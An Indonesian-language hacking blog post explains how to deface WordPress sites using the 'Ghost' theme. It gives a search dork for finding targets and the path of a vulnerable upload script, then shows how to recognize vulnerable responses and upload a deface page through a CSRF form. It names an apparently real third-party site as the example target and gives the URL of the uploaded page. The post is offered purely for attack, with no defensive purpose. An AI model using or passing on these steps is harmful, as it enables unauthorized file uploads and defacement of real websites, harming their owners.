Cara deface Wp ghost Theme

Cara deface Wp ghost Theme
1 siapkan dork
dork: inurl:wp-content/themes/Ghost/

2.exploitnya /wp-content/themes/Ghost//includes/uploadify/upload_settings_image.php

3.Nah kalau vuln bacaanya {"status":"NOK", "ERR":"This file is incorect"}
4.kita masuk crsf mank

touch me senpai kita masukin targetnya:http://www.juvankoski.com/wp-content/themes/Ghost//includes/uploadify/upload_settings_image.php

kita masukin postnya [filedata] ke crsfnya


kita upload, pilih file heked by kita

kalo ada bacaan {"status":"OK","imageID":"indexhtml","imageName":"index.html","html":"\n\t\n\t\t
html File<\/div><\/td>\n\t\tindex.html
\n\t\t\t[Delete]<\/a>\n\t\t<\/td>\n\t<\/tr>\n"}
berarti vuln!!!

dan jika di upload muncul kaya gini
berarti uploadnya gk bisa cari lagi site lain
thanks to kuro w lupa kalo udah upload gk vulnya gimana

5.nah kalo gitu cara manggil scnya
http://www.juvankoski.com/wp-content/uploads/settingsimages/sclu.html
أحدث أقدم